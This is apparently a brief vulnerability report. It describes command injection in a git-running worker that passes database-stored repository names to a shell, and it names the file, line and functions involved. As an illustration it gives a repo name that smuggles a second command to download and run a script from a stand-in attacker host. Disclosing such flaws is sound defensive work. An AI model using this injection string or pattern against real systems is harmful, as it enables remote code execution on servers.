our facade worker executes git commands using shell=True with repository data from the database. this means if someone adds a malicious repo name like-

innocent-repo, curl attacker.com/malware.sh | bash
our server will execute both git command and malicious code.

it is present in config.py (line 285)
function- run_git_command(), called from- repofetch.py and other facade operations